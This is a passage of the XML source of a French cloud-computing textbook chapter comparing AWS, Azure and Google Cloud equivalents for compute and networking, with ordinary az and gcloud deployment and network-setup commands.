            <w:tcW w:type="dxa" w:w="212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Google Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2504"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Machine virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EC2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compute Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="250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Conteneur sans serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Fargate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Container Apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Cloud Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2504"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GKE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="250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Fonction événementielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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Cloud Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2504"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lot managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2128"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux déploiements comparables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Azure Container Apps : déploiement depuis une image</w:t>
        <w:br/>
        <w:t>az containerapp create \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --name api --resource-group demo --environment demo-env \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --image registry.exemple.fr/equipe/app:1.4.2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --target-port 3000 --ingress external \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --min-replicas 1 --max-replicas 5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Cloud Run : équivalent chez Google</w:t>
        <w:br/>
        <w:t>gcloud run deploy api \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --image europe-docker.pkg.dev/mon-projet/app/app:1.4.2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --region europe-west1 --allow-unauthenticated \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --min-instances 1 --max-instances 5 --port 3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les plateformes de conteneurs sans serveur facturent à la requête ou à la seconde d'instance active. Le paramètre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-instances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite les démarrages à froid, au prix d'une facturation permanente.</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DÉMARRAGE À FROID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Temps de démarrage d'une instance inactive. Il dépend de la taille de l'image, du runtime et des initialisations. Réduire l'image et préchauffer sont les deux leviers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>72.4 Réseau</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les modèles réseau diffèrent surtout par la gestion des adresses et des pare-feux. Le principe reste : séparer public et privé, n'ouvrir que le nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.269 — Cinq aspects réseau</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245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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Google Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau virtuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2341"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>VNet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Pare-feu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Groupe de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Groupe de sécurité réseau (NSG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Règles de pare-feu VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie privée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NAT Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2341"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NAT Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Lien privé vers un service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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PrivateLink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Private Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Private Service Connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DNS interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Route 53 Resolver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2341"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DNS privé Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2107"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud DNS privé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux configurations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Azure : créer un réseau et un sous-réseau</w:t>
        <w:br/>
        <w:t>az network vnet create --resource-group demo --name vnet-demo \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --address-prefix 10.0.0.0/16 --subnet-name app --subnet-prefix 10.0.1.0/24</w:t>
        <w:br/>
        <w:br/>
        <w:t># Google Cloud : réseau et règle de pare-feu</w:t>
        <w:br/>
        <w:t>gcloud compute networks create vpc-demo --subnet-mode=custom</w:t>
        <w:br/>
        <w:t>gcloud compute networks subnets create app --network=vpc-demo \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --region=europe-west1 --range=10.0.1.0/24</w:t>
        <w:br/>
        <w:t>gcloud compute firewall-rules create allow-https \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --network=vpc-demo --allow=tcp:443 --source-ranges=0.0.0.0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>72.5 Choisir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le choix d'un fournisseur se joue rarement sur la technique pure. Cinq critères objectifs pèsent davantage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.270 — Cinq critères de choix</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19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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Poids</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compétences existantes</w:t>
            </w:r>
          </w:p>
